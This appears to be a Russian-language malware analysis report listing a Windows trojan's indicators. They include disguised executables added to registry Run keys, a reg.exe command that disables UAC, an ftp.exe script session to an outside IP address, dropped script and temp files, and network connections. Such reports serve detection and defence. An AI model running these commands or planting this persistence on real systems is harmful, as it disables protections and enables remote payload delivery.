Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Userinite' = '%WINDIR%\system\drivers\svchot.exe -s'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Userini' = '%WINDIR%\system\drivers\userprofile.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Userinit' = '%WINDIR%\system\setup.exe'
- Средство контроля пользовательских учетных записей (UAC)
- '<SYSTEM32>\ftp.exe' -s:%WINDIR%\inf\13438.txt 185.13.227.163
- '<SYSTEM32>\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
- '<SYSTEM32>\find.exe' /i "TTL="
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\inf\security.cmd" "
- '<SYSTEM32>\ping.exe' www.google.com
- %WINDIR%\inf\security.cmd
- %WINDIR%\inf\13438.txt
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %WINDIR%\inf\security.cmd
- %WINDIR%\inf\13438.txt
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 'localhost':1038
- '18#.#3.227.163':21
- DNS ASK www.google.com
- ClassName: 'Indicator' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''